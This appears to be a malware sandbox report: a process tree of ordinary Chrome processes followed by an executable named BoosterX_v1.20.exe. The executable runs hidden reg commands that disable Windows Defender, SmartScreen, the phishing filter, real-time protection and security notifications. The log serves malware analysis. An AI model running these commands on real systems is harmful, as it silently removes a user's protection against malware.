C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabeac4f50,0x7ffabeac4f60,0x7ffabeac4f70
2⤵
PID:776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2
2⤵
PID:1660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
2⤵
PID:1488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:1
2⤵
PID:4868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
2⤵
PID:4748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:8
2⤵
PID:4348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4852 /prefetch:8
2⤵
PID:2988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:8
2⤵
PID:2720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8
2⤵
PID:3716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
2⤵
PID:2228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:8
2⤵
PID:2980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
2⤵
PID:1800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3264 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 /prefetch:8
2⤵
PID:2276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1176 /prefetch:8
2⤵
PID:2324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5016 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:8
2⤵
PID:4580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 /prefetch:8
2⤵
PID:1576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
2⤵
PID:3664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:8
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:8
2⤵
PID:4828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1240 /prefetch:8
2⤵
PID:1768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
2⤵
PID:3848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=908 /prefetch:8
2⤵
PID:4500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:1
2⤵
PID:3472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=976 /prefetch:1
2⤵
PID:3580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:8
2⤵
PID:4244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:8
2⤵
PID:1392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:8
2⤵
PID:3572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
2⤵
PID:4588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:8
2⤵
PID:4904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
2⤵
PID:3092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
2⤵
PID:2492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:8
2⤵
PID:3296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1148 /prefetch:8
2⤵
PID:3400

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1936

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4648

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
"C:\Users\Admin\Desktop\BoosterX_v1.20.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2148

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" /hidden
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" /hidden
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
4⤵
PID:116

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f" /hidden
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f" /hidden
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
4⤵
PID:3708

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
5⤵
PID:2800

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden
3⤵
PID:5112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
4⤵
PID:4580

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
5⤵
PID:2204

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f" /hidden
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f" /hidden
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense /v Start /t REG_DWORD /d 4 /f
4⤵
PID:2368

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense /v Start /t REG_DWORD /d 4 /f
5⤵
PID:3088

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764

C:\Users\Admin\Desktop\BoosterX_v1.20.exe
/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden
3⤵
PID:432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f
4⤵
PID:4588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
2⤵
PID:3096

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
3⤵
PID:2748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
2⤵
PID:3160

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
3⤵
PID:2804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:1056

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:1820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f
2⤵
PID:3128

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f
3⤵
PID:4684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "1" /f
2⤵
PID:5012

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "1" /f
3⤵
PID:4048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4284

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3616

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:4848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
2⤵
PID:2356

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
3⤵
PID:3816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
2⤵
PID:4340

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\system32\reg.exe
Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
3⤵
PID:3708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:4100

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:2276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
2⤵
PID:704

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
3⤵
PID:2720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:3312

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:4440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
PID:4512

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
3⤵
PID:3328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
PID:448

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4048

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
3⤵
PID:3700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:3556

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:3404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:1612

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
3⤵
- Modifies data under HKEY_USERS
PID:2260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:3788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2368

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
3⤵
PID:1068

C:\Windows\System32\cmd.exe
